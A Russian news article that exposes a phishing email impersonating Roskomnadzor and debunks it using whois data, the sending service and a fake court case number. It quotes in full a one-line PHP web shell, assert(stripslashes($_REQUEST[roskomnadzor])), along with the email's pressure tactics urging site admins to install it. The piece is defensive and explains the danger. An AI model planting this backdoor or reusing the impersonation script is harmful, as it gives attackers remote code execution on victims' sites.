Куда заведет «roskomnadzor»?

Оценить
Последние новости из мира отношений государственных органов и информационных технологий сводятся к тому, что Роскомнадзор все время что-то запрещает. Учитывая, что в большинстве своем интернет-пользователи не очень сильно разбираются в вопросах программирования и судебных тяжб, грех не воспользоваться такой ситуацией.

Последние новости из мира отношений государственных органов и информационных технологий сводятся к тому, что Роскомнадзор все время что-то запрещает, что-то пытается запретить или что-то передумал запрещать. Другими словами, одни сплошные страшилки. Учитывая, что в большинстве своем интернет-пользователи не очень сильно разбираются в вопросах программирования и судебных тяжб, грех не воспользоваться такой ситуацией – решили очередные прохиндеи.

Сегодня наша редакция получила письмо по электронной почте от якобы Роскомнадзора следующего содержания (орфография и пунктуация сохранены):

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени fn-volga.ru в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон «Об информации, информационных технологиях и о защите информации» и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015, Ваш сайт fn-volga.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени fn-volga.ru, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2.
 Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени fn-volga.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: fn-volga.ru/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени fn-volga.ru, следую инструкции указанной выше, то Ваш сайт fn-volga.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

–––––––––––
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

Здесь и ссылка на действующий закон, и на решение суда. И еще указано наказание за неисполнение требования. Но почему я в самом начале использовал слово «якобы»? Потому что несложная проверка полученной информации дает понимание, что государственные органы РФ, как бы я к ним ни относился, к этому письму не имеют никакого отношения по следующим причинам:

1. Проверяем адрес, с которого пришло письмо [email protected] Если ввести адрес домена в браузере, то мы автоматически перейдем на настоящий сайт Роскомнадзора rkn.gov.ru. Но сервис whois говорит нам, что домен ROSKOMNADZOR.ORG создан 19.08.2015.

Registrant Street: Ocean Centre, Montagu Foreshore
Registrant Street: East Bay Street
Registrant City: Nassau
Registrant Country: BS

«BS» – это Содружество Багамских Островов или (привычнее для нашего уха) Багамы – странное местонахождение для владельца государственного сайта, не правда ли?

2. Рядом с исходящим адресом письма указано, что оно прислано с через sendgrid.me – популярный американский сервис для массовой рассылки электронных писем. Тоже необычный выбор для тех, кто борется за перевод российских сайтов и хранящихся на них персональных данных на отечественные серверы.

roskomnadzor

3. В письме фигурирует решения Новокуйбышевского городского суда Самарской области от 11.08.2015 No 21618/2015. Поиск на сайте суда по данному номеру не дает результата. Однако если просмотреть html-версию текста, то мы обнаружим, что номер на самом деле состоит не из 10 знаков, а из 11. Между двойкой и единицей в самом начале вставлен невидимый символ переноса. На самом деле так бывает при копировании текста из одной в программы в другую – дефис может замениться символом переноса и наоборот. Восстанавливаем номер дела – 2-1618/2015. По этому номеру мы легко находим гражданский спор из трудовых отношений между физическим лицом и его работодателем. Роскомнадзор тут и близко не стоял.

Этого было бы достаточно для того, чтобы, прочитав письмо, посмеяться и пойти заниматься дальше своими делами. Если же посмотреть на то, что требуют от нас мошенники, то, на первый взгляд, ничего серьезного – разместить файл с безобидным PHP-кодом, не содержащим ни вирусов, ни троянов. Если же изучить подробнее функции assert и stripslashes, прописанные в этом коде, то станет ясно, что злоумышленники вынуждают нас разместить скрипт, который расшифрует и выполнит все, что будет указано в переменной roskomnadzor. Вам хочется проверить, куда вас заведет эта переменная «roskomnadzor»? Мне – нет.

А что же Роскомнадзор? Местные ни о чем таком не знают, а федеральные в курсе, что от их имени действуют мошенники и что этот случай не первый. Но найти прохиндеев пока никому не удалось.